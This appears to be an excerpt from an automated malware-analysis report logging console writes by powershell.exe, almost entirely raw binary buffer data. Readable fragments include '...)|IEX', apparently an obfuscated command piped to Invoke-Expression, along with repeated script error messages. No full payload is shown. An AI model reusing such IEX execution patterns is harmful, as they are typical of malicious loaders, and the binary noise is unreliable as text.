          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......P..............._.............}..v....XL......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............4..j.....M................_.............}..v.....M......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j......P..............._.............}..v....XT......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............4..j.....U................_.............}..v.....U......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......P..............._.............}..v....X\......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............4..j.....]................_.............}..v.....]......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......P..............._.............}..v....Xd......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............4..j.....e................_.............}..v.....e......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......P..............._.............}..v....Xl......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............4..j.....m................_.............}..v.....m......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....Xt......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....u................_.............}..v.....u......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X|......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....}................_.............}..v.....}......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............6.7.7.8.).|.I.`.E.`.X............._.............}..v....(.......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....`.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....(.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....`.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .x.c.e.p.t.i.o.n............._.............}..v............0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....0.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......P..............._.............}..v.... .......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....X.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v............0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....P.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.5.6.............}..v....`.......0.................P.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....` ......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....!................_.............}..v.....!......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`(......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....)................_.............}..v.....)......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`0......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....1................_.............}..v.....1......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`8......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....9................_.............}..v.....9......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`@......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....A................_.............}..v.....A......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`H......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....I................_.............}..v.....I......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`P......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....Q................_.............}..v.....Q......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`X......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....Y................_.............}..v.....Y......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....``......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....a................_.............}..v.....a......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j......P..............._.............}..v....`h......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............4..j.....i................_.............}..v.....i......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......P..............._.............}..v....`p......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............4..j.....q................_.............}..v.....q......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j......P..............._.............}..v....`x......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............4..j.....y................_.............}..v.....y......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......P..............._.............}..v....`.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......P..............._.............}..v....` ......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............4..j.....!................_.............}..v.....!......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j......P..............._.............}..v....`(......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............4..j.....)................_.............}..v.....)......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......P..............._.............}..v....`0......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............4..j.....1................_.............}..v.....1......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j......P..............._.............}..v....`8......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............4..j.....9................_.............}..v.....9......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......P..............._.............}..v....`@......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............4..j.....A................_.............}..v.....A......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j......P..............._.............}..v....`H......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............4..j.....I................_.............}..v.....I......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`P......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....Q................_.............}..v.....Q......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............6.7.7.8.).|.I.`.E.`.X............._.............}..v....0U......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....U................_.............}..v....hV......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0]......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....]................_.............}..v....h^......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .x.c.e.p.t.i.o.n............._.............}..v.....b......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....b................_.............}..v....8c......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....`h......0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....i................_.............}..v.....i......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......P..............._.............}..v....(m......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....m................_.............}..v....`n......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....`.P..............._.............}..v.....c......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................_.............}..v.... e......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v............0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v.... .......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.5.7.............}..v....0.......0.................P.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0%......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....%................_.............}..v....h&......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....0-......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....-................_.............}..v....h.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....3......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....4................_.............}..v.....5......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....;......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....<................_.............}..v.....=......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .x.c.e.p.t.i.o.n............._.............}..v.....@......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j....XA................_.............}..v.....A......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....G......0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....G................_.............}..v....8H......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......P..............._.............}..v.....K......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....L................_.............}..v.....M......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....H.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v............0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............da.j....@FP..............._.............}..v.... b'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................a.j.....b'..............._.............}..v....Xc'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......u.p.p.o.r.t.e.d..."..............._.............}..v.....f'.....0................BP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................a.j.....g'..............._.............}..v.... h'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.5.9.............}..v....0l'.....0................BP.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................a.j.....l'..............._.............}..v....hm'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............da.j....@FP..............._.............}..v....0t'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G................a.j.....t'..............._.............}..v....hu'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............da.j....@FP..............._.............}..v....0|'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S................a.j.....|'..............._.............}..v....h}'.....0................CP.............................
